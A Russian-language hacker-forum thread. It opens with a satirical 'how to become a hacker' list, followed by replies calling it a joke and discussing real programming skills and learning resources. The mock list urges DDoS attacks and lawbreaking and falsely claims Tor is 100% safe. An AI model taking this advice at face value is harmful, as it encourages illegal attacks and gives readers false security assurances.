    Если у вас есть что то, имеющее процессор, обязательно установите Kali на это. На ваш мобильный телефон, Raspberry Pi, пять флешек, все, что попадется под руки - установите Kali.

    8. Установите Tor Browser.

    Tor - это 100% надежный способ хакнуть и не попасться. Даже правительство не может взломать Tor, так что вы будете в безопасности только в случае установленного на вашей машине Tor Browser Bundle.

    9. Не тратьте свое время на Linux.

    Linux - это пустая трата времени, и вам следует придерживаться Windows. Вам не нужен терминал, CMD установлен по умолчанию в вашей системе, а все хорошие тулзы имеют графический интерфейс.
    10. DDoS решает.

    DDoS'те вебсайты или что угодно. Опять же, убеждайте всех, что вы это делаете из политических мотивов. DDoS-атаки являются вершиной искусства хакерства, независимо от того, что говорят другие. Если вы можете обрушить такую огромную систему как Steam - вы реально круты и являетесь 1337. Теперь оставьте твит своим фейковым фолловерам, и закупите ретвитов.

    11. Измените в социальных сетях фото вашего профиля.

    Вы должны изменить фотографию вашего профиля в социальных сетях на что либо связанное с хакерством. Это может быть костюм Anonymous или их земной шар. Это важно, потому что вы должны быть уверены в том, что бабушки и дедушки ваших друзей знают, что вас не стоит наебывать, а так же это придает вам доверия в твиттере.

    Вот некоторые примеры:
    1. 2. 3.

    12. Если вы не нарушаете закон, значит вы занимаетесь чем то не тем.

    Если то, что вы делаете не является незаконным, вам нужно поработать над чем то другим. Не тратьте время на вещи, которые не смогут вас приблизить к тюремному заключению.

    13. Приобретите себе балахон темных цветов.

    Вы должны найти себе балахон и носить его каждый день. Я бы сказал, что вы должны и спать в нем, но сон - это не удел хакеров. Кроме того, постарайтесь на Defcon получить прекрасный балахон с логотипом Kali или что либо подобное.

    14. Друзья только в IRC.

    Вам не нужно возвращаться в реальный мир, вам не нужны персональные аккаунты в социальных сетях, и все те люди, с которыми вы тусовались в средней школе - скрипткидди и пустая трата времени. Помните, что вы хакер и должны себя вести антиобщественно настолько, насколько это возможно, потому что никто не сможет вас понять, когда вы говорите на 1337 5p33k.
    Заключение.

    В принципе вам достаточно поверхностного изучения для того, что бы быть реальным хакером. На самом деле даже не нужно учить С или какой либо веб-язык, просто читайте посты на хакерских форумах и держите удар.

    БОНУС для читателей:

    Хочиш Стать Онанимусом И Постить Картинки С Гаям Фоксам И Штобы Тибя Баялис Все В Интернетах И Особинна Аднакласснеки? Хочишь Узнат Все Сикреты Хакирных Анонимусов, Каторые Нипращают И Никово И Ничево Не Зобывают* ?

    Кроб-Наеб-Приват-Партнерка
     
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    6.047
    Симпатии:
    523
    Пол:
    Мужской
    Репа:
    +1.129 / 162 / -33
    Telegram:
    Чот спорные моменты, больше подходят для скрипт-кидди и товарищей которые любят ломать сайты для темных дел, аля кардеров, которые ломают интернет-магазины для кражи кредиток...

    Тут согласен, можно юзать готовые сплоиты, или купить...

    Вот только имхо к хакерству это не имеет отношения, вообще понятие обширное, но если цель научится разрабатывать что-то свое, то тут без умения программировать не обойтись, да согласен само по себе знание си ничего не дает, т.к. нужно в зависимости от задач еще много чего знать, но извините научить компилировать и юзать готовые сплоиты можно и школьника, разве это хакер ?

    А без умения кодить и понимания сплоит не напишите, в принципе язык не важен, не нравится си можно и на питоне писать и на делфи, да хоть на машинных кодах, лично мне вообще пофиг, если задачу решает и ладно ! :)
     
  4. Антоха Уважаемый пользователь
    Антоха
    Ответить в чате

    Форумчанин

    Регистрация:
    26.12.2012
    Сообщения:
    3.289
    Симпатии:
    11.168
    Пол:
    Мужской
    Репа:
    +11.334 / 49 / -7
    Это вообще-то шутеечка была:) Там ни одного момента нет правильного. Это стёб над псевдокакирами.
     
    • Мне нравится Мне нравится x 1
  5. Hooko Уважаемый пользователь
    Hooko
    Ответить в чате

    Форумчанин

    Регистрация:
    24.08.2016
    Сообщения:
    218
    Симпатии:
    200
    Пол:
    Мужской
    Репа:
    +221 / 4 / -4
    Jabber:
    Ну да. Ну и книжечка как бы сомнительного характера. Ну не совсем серьезно.
     
  6. virt Житель форума
    virt
    Ответить в чате

    Форумчанин

    Регистрация:
    24.11.2016
    Сообщения:
    206
    Симпатии:
    56
    Пол:
    Мужской
    Репа:
    +91 / 2 / -1
    Для начала понять-бы кто такой этот "Хакер" ?

    Если взломщик, то как написано всё-верно, зарегился на форум, где выкладывают паблик софт, научился его юзать и вперёд, ну-да ник нужно обязательно никнейм крутой придумать и сисястую бабу на авку поставить, иначе репа стрёмная будет ! :)

    На кой-хрен мне этот си и кодить ещё учится ? Я скачаю криптор, почищу его тулзой и всё ! )))

    Если-что это была шутка, а если серьёзно, то ИМХО:


    1. Нет путных хак. форумов, может пара блогов есть, где что-то реальное и нормальное обсуждаются, поэтому в основном кто в теме, лишь продают товары там для "Хакеров".

    2. Есть кодерские форумы, где есть обсуждения части каких-то проблем, например при возникновении проблемы при реализации чего-либо, либо есть уже в гугле такая тема, либо можно создать, но чаще всего приходится раскуривать самому всё...:)

    Так-что основная задача разработчика, ИМХО не важно какой-части в сфере безопасности или просто кодера, это:

    1. Если идёт переделка софта, например нужно добавить новый функционалл, это уметь в короткие сроки разобраться с имеющимся кодом, ну и соответственно ничего не порушив добавить свой;

    2. Если разработка что-то нового, нужно опять-таки во первых понять что уже есть, может можно заюзать то-что уже есть, например кодить какие-то либы с нуля смысла нет, правильней подцепить их к своей программе, но не бездумно как многие делают, а разобравшись в сути, может нужно что переделать и т.д.
     
  7. virt Житель форума
    virt
    Ответить в чате

    Форумчанин

    Регистрация:
    24.11.2016
    Сообщения:
    206
    Симпатии:
    56
    Пол:
    Мужской
    Репа:
    +91 / 2 / -1
    Ещё может-интересно быть обучающие статьи/ролики типо-как у Нарвахо, раньше были сайты, сейчас мало кто этим занимается, видно неинтересно ! :(
     
  8. Hooko Уважаемый пользователь
    Hooko
    Ответить в чате

    Форумчанин

    Регистрация:
    24.08.2016
    Сообщения:
    218
    Симпатии:
    200
    Пол:
    Мужской
    Репа:
    +221 / 4 / -4
    Jabber:
    Что за Нарвахо?
     
  9. virt Житель форума
    virt
    Ответить в чате

    Форумчанин

    Регистрация:
    24.11.2016
    Сообщения:
    206
    Симпатии:
    56
    Пол:
    Мужской
    Репа:
    +91 / 2 / -1
    "Введение в крэкинг с нуля", если какие-нить подобные статью по хакерству, вирусологии и т.д., для новичков будет, то прикольно ! :)

    Но сейчас это мало кому интересно, т.е. мало кто будет делать такие статьи ! :(
     
  10. Hooko Уважаемый пользователь
    Hooko
    Ответить в чате

    Форумчанин

    Регистрация:
    24.08.2016
    Сообщения:
    218
    Симпатии:
    200
    Пол:
    Мужской
    Репа:
    +221 / 4 / -4
    Jabber:
    Предположу что, это происходит в рунете. На зарубежных площадках не плохой движняк.

    На счет интереса, это да. С каждым годом объем инфы которую надо изучить растет и растет. С одной стороны порог входа в эту область падает, путем использования готовых решений, но с другой - он разбивается вдребезги, если хочешь делать серьезные вещи.